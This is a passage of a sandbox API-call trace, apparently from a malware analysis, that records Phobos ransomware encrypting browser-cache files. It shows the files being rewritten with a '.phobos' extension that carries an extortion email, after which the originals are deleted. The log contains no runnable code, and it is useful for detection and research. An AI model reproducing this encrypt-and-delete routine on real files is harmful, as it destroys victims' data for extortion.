[0180.894] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.894] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa6snz6[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.895] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0180.895] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.895] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2ed, lpOverlapped=0x0) returned 1 [0180.942] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f0, dwBufLen=0x2f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f0) returned 1 [0180.942] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2f0, lpOverlapped=0x0) returned 1 [0180.943] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0180.943] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.943] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.943] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0180.943] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.943] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.943] CloseHandle (hObject=0x134) returned 1 [0180.943] CloseHandle (hObject=0x194) returned 1 [0180.943] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa6snz6[1].png")) returned 1 [0180.944] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aabyinc[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.945] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=764) returned 1 [0180.945] CloseHandle (hObject=0x194) returned 1 [0180.945] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aabyinc[1].png")) returned 0x2020 [0180.946] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aabyinc[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aabyinc[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.946] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.946] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aabyinc[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.946] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0180.946] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.947] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2fc, lpOverlapped=0x0) returned 1 [0181.144] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x300, dwBufLen=0x300 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x300) returned 1 [0181.144] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x300, lpOverlapped=0x0) returned 1 [0181.145] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0181.145] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.145] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0181.145] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.145] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0181.145] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0181.145] CloseHandle (hObject=0x194) returned 1 [0181.145] CloseHandle (hObject=0x134) returned 1 [0181.145] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAbyinC[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aabyinc[1].png")) returned 1 [0181.146] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0181.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0181.148] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1616) returned 1 [0181.148] CloseHandle (hObject=0x134) returned 1 [0181.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm")) returned 0x2020 [0181.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0181.148] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.148] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.149] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0181.149] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.149] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x650, lpOverlapped=0x0) returned 1 [0181.155] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x660, dwBufLen=0x660 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x660) returned 1 [0181.155] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x660, lpOverlapped=0x0) returned 1 [0181.156] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0181.156] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.156] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0181.156] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.156] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x172, lpOverlapped=0x0) returned 1 [0181.156] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0181.156] CloseHandle (hObject=0x134) returned 1 [0181.156] CloseHandle (hObject=0x194) returned 1 [0181.156] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm")) returned 1 [0181.158] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0181.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bb5zdwx[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.159] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=704) returned 1 [0181.159] CloseHandle (hObject=0x194) returned 1 [0181.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bb5zdwx[1].png")) returned 0x2020 [0181.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bb5zdwx[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bb5zdwx[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.159] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.159] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bb5zdwx[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0181.160] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0181.160] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.160] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2c0, lpOverlapped=0x0) returned 1 [0181.186] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0) returned 1 [0181.186] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2d0, lpOverlapped=0x0) returned 1 [0181.187] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0181.187] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.187] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0181.187] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.187] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0181.187] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0181.187] CloseHandle (hObject=0x194) returned 1 [0181.187] CloseHandle (hObject=0x134) returned 1 [0181.226] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BB5zDwX[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bb5zdwx[1].png")) returned 1 [0181.227] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0181.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbblccz[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.228] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8515) returned 1 [0181.228] CloseHandle (hObject=0x15c) returned 1 [0181.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbblccz[1].jpg")) returned 0x2020 [0181.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbblccz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbblccz[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.228] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.228] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbblccz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0181.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0181.229] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.229] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2143, lpOverlapped=0x0) returned 1 [0181.233] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2150, dwBufLen=0x2150 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2150) returned 1 [0181.234] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2150, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2150, lpOverlapped=0x0) returned 1 [0181.235] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0181.235] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.235] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0181.235] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0181.235] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, 